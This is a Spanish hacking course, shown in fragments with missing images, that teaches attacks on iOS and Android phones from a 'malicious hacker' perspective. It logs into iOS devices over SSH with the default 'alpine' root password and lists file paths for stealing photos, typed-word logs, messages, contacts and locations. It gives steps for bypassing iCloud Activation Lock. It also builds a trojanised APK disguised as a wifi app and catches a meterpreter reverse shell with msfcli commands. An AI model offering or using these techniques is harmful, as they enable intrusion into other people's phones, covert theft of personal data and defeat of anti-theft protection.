Documentos de Académico
Documentos de Profesional
Documentos de Cultura
del
documento]
-Hackeo de dispositivos iOS
-Hackeo de dispositivos Android
1.Escaneando la red.
Para poder identificar si dentro de nuestra red se encuentra conectado un
dispositivo iOS al que podamos intentar vulnerar necesitaremos hacer un
escaneo de la misma, para lo cual podemos usar aplicaciones conocidas
como escneres de red. Haremos un escaneo con 2 herramientas muy tiles
para nuestro propsito. Empezaremos con un programa llamado Zenmap,
que es la GUI del conocido Nmap. (disponible para Windows, mac y Linux)
Por lo general este tipo de escaneos tiende a ser un poco tardado, slo es cuestin de
ser paciente y dejar que el programa haga lo suyo. Una vez terminado el escaneo,
encontramos que hay un dispositivo con iOS dentro de nuestra red y que aparte est con
el puerto 22 abierto corriendo el servicio de Open SSH. QUE SUERTE! :D
Como alternativa a Zenmap (Nmap) podramos usar una app llamada Fing la cual est
disponible tanto en la App Store como en la Google Play Store, la cual con solo un toque
empezar a escanear nuestra red local en busca de todos los dispositivos conectados a
la misma. De igual forma podremos encontrar los dispositivos iOS que estn conectados.
ANDROID
iOS
Una vez que tenemos nuestro target que encontramos gracias a los
escaneos procederemos a utilizar el framework metasploit para intentar
vulnerar el Open SSH del dispositivo.
2. Vulnerando con metasploit
Iniciamos el framework metasploit:
ssh root@10.210.16.103
Nos pedir la contrasea para el usuario root, la cual sabemos que es alpine y una vez
dentro pondremos en la consola pwd para saber donde estamos situados:
10
4. Las siguientes pestaas las dejaremos tal y como estn y enseguida nos
dirigiremos a la pestaa de START y lanzaremos el ataque, si este llega a
ser exitoso con algn password de la lista que utilizamos el programa nos lo
indicar de inmediato.
11
3. Postexplotacin
Una vez estando dentro del dispositivo vctima podremos hacer muchas cosas. Dentro
de este curso daremos un recorrido rpido por las acciones ms comunes que se
podran realizar desde un punto de vista de un hacker malicioso.
Tecleando help dentro de la consola nos aparecern una serie de comandos que
podremos usar dentro de nuestro dispositivo, sin embargo, no vamos a profundizar en
cada uno de ellos ya que es una lista larga.
12
Configurando el SSH:
Para hacer esta documentacin mas completa incluir a continuacin una forma rpida
de activar ese servidor en la distribucin Kali Linux y Mac OS X ya que esta
herramienta nos servir para extraer los archivos del dispositivo vulnerado.
OK, empecemos con la configuracin del servidor SSH. En mi caso estar usando una
mquina virtual de Kali Linux.
13
Primero necesitars verificar si tu mquina tiene activo algn servicio de SSH activo, para
lo cual pondremos el siguiente comando en la consola:
En este caso ya estaba instalado previamente el servidor y el cliente. Para iniciar los
servicios SSH pondremos en la consola root@kali~# service ssh start y para
checar que el servicio est activo pondremos root@kali~# service ssh status
14
15
Una vez terminada la transferencia revisamos nuestra carpeta de destino donde elegimos
guardar la foto y listo, de la misma forma pueden seguir robando mas fotos o videos:
16
2. Keylogger
Algo muy interesante, iOS almacena en texto plano una especie de registro con las
palabras usadas, algo sin duda muy til si estamos en busca de contraseas ;)
La ruta donde se encuentra estos archivos es:
/private/var/mobile/Library/Keyboard/es_ES-dynamic-text.dat
y dentro de ella podremos encontrar los archivos es_ES-dynamic-text.dat
y dynamic-text.dat
Usaremos el mismo comando del ejemplo pasado para extraer los archivos y veamos
que contienen.
17
Abriendo el archivo con un editor de texto nos muestra en texto plano las palabras que
se han escrito desde el teclado del dispositivo (por privacidad esta imagen la puse
borrosa)
18
Una vez extraido el archivo segn sea el caso, lo abriremos con un gestos de bases
SQLite y observaremos algo as:
19
Si seguimos mirando ms tablas podemos ver todo: contactos, nmeros de telfono, mensajes
enviados y recibidos, las fechas....
Tambien encontramos que hay otra base sqlite con todos los contactos en la misma ruta
pero con el nombre de Contacts.sqlite
20
Tambin podremos usar una herramienta web para interpretar la base de datos sqlite sin
necesidad de tener un programa. En la pgina de http://www.recovermessages.com
podremos subir nuestra bd y se generarn las tablas con la informacin correspondiente
y lo mejor es que no solo nos sirve para interpretar la base de datos del whatsapp sino
tambin las bases de: WhatsApp Android, WhatsApp IPhone, Tuenti IPhone,
SpotBros IPhone, Line IPhone, SMS Android, SMS IPhone, EMails Android, EMails
IPhone.
21
5. Twitter
En el siguiente archivo podemos obtener datos datos como nombre de usuario en twitter,
ltimas bsquedas y tweets...
/private/var/mobile/Applications/(ruta que vara)/Library/Preferences\com.atebits.Tweetie2.plist
6. SMS (iPhone)
/private/var/mobile/Library/SMS sms.db
7. Localizaciones
/private/var/root/Library/Caches/locationd/consolidate.db
8. Mails
/private/var/mobile/Library/Mail
9. Preferencias de aplicaciones
/private/var/mobile/Library/Preferences
10. Lista de contactos
/private/var/mobile/Library/AddressBook
Y muchas ms rutas!!!
Esto es solo un pequeo ejemplo de algunas cosas que podemos ver. Por supuesto
hay muchas ms rutas y si las mirsemos todas estaramos aqu un buen rato as
que aqu slo les dej algunas de las ms interesantes, si quieren obtener mas,
sera cuestin de que ustedes mismos investiguen.
22
Mucho se ha hablado sobre la posibilidad de quitar el famoso sistema de seguridad dentro de iOS 7 que
consiste en el bloqueo del equipo que corra dicho sistema mediante la cuenta iCloud del usuario dueo. En
muchos sitios en internet se especula sobre diversos mtodos y herramientas para lograr burlar o desactivar
este bloqueo. En las siguientes pginas se mostrarn algunos de ellos, as como, los bugs dentro de iOS 7 que
te permitirn borrar las cuentas de iCloud sin necesidad de usar ningn tipo de tolos.
2.1 Mtodo hacktivate (compatible nicamente con iPhone 4)
Este mtodo se basa en la utilizacin de una herramienta que mediante el uso del modo DFU del iPhone 4 se
explota una vulnerabilidad en el procesador del dispositivo teniendo la posibilidad de instalarle el servidor ssh y
de esa forma borrar los archivos de configuracin donde se encuentra almacenada la cuenta iCloud. Cabe
aclarar que este mtodo se realizar dentro del sistema operativo Windows. EMPECEMOS!
23
2. Descarga e instala la tool iOS Soft Dev Pack + JB iOS 7.1 V2 y ejectala.
(para realizar la instalacin de la tool es necesario contar con .net
framework 3.5 o superior instalado)
Seleccionamos
24
25
26
27
Como se menciona en el texto anterior, se tiene que seleccionar al mismo tiempo las opciones de desactivar
Find my iPhone y Delete Account
Posteriormente aparecer una pantalla como esta donde parecieran estar amontonadas las opciones de
desactivar Find my iPhone con la de borrar la cuenta iCloud, felicidades, si te apareci algo como esto lo nico
que tienes que hacer es reiniciar el dispositivo, (en este punto podremos notar que la opcin de Find my iPhone
ya se encuentra desactivada) nos dirigiremos de nuevo a la configuracin de iCloud y ahora seleccionaremos
Eliminar cuenta si lo notas ahora no nos pedir la contrasea de la cuenta iCloud para eliminarla e incluso la
medida de seguridad conocida como Activation Lock tambin desaparecer.
28
Posteriormente presionaremos Delete Account, enseguida Delete otra vez, muy importante, durante la
animacin en la que aparece la segunda opcin para confirmar el borrado de la cuenta es necesario mover el
switch de find my iPhone como si lo fueramos a DESACTIVAR, y una vez presionado Delete from My iPhone
hacer lo mismo. Cuando el sistema te pida la contrasea daremos en cancel y si hiciste bien el procedimiento
ahora el switch de Find my iPhone quedar parcialmente desactivado
29
Lo siguiente que tendremos que hacer ser entrar a la pestaa de la cuenta iCloud donde se encuentra el
correo y la contrasea. Borraremos el password y la palabra iCloud y apretaremos en done, nos mandar un
mensaje de error y repetiremos este procedimiento 2 veces en total. Una vez terminado daremos en cancel
Enseguida volveremos a entrar a esa pestaa y escribiremos en el espacio que qued en blanco la palabra
iCloud y listo, cuando quieran borrar la cuenta iCloud del dispositivo no deber ser necesario introducir la
contrasea.
30
Volvemos a entrar a la pestaa per ahora borraremos la palabra iCloud y dejaremos el espacio en blanco, una
vez que apretemos done podremos observar que el switch de Find my iPhone estar desactivado y que
incluso podremos borrar la cuenta iCloud sin necesidad de la contrasea
31
32
Enseguida empezaremos el procedimiento para crear un .apk con infeccin para obtener
una Shell meterpreter de manera local y remota.
2. Tengamos en cuenta los datos de conexin que usaremos para la creacin de nuestra
.apk.
33
5. En este caso para la explotacin usaremos un dispositivo Android xperia pro modelo
mk16a.
34
cdigo de la .apk infecciosa dentro del cdigo de wifi test auditor (app para sacar claves wifi)
subirla a play store o subirla a algn servicio como mega, dropbox etc y difundirla para que
esta sea instalada pensando que es como cualquier otra app inofensiva.
Este paso lo dejar a la creatividad y habilidad del lector.
./msfcli
exploit/multi/handler
PAYLOAD=android/meterpreter/reverse_tcp
LHOST=IP_LOCAL/NO-IP
LPORT=PUERTO
E
./msfcli
exploit/multi/handler
PAYLOAD=android/meterpreter/reverse_tcp
LHOST=10.210.45.38
LPORT=6789
E
(Si la app fue ejecutada dentro del dispositivo infectado debemos tener xito al ejecutar el
comando)
Gonzalo Snchez Surez - Drummer Wolf
35
Para darnos una idea de lo que podemos ejecutar dentro de la Shell meterpreter
teclearemos el comando help
Description
----------Help menu
Backgrounds the current session
bgkill
bglist
bgrun
channel
close
Closes a channel
help
Help menu
info
interact
irb
load
quit
read
resource
run
36
use
write
Description
-------
-----------
cat
cd
Change directory
download
edit
getlwd
getwd
lcd
lpwd
ls
mkdir
Make directory
pwd
rm
rmdir
Remove directory
search
upload
Description
-------
-----------
ifconfig
Display interfaces
ipconfig
Display interfaces
37
portfwd
route
Description
-----------
execute
Execute a command
getuid
ps
shell
sysinfo
Description
-----------
record_mic
38
dispositivo.
39
40
41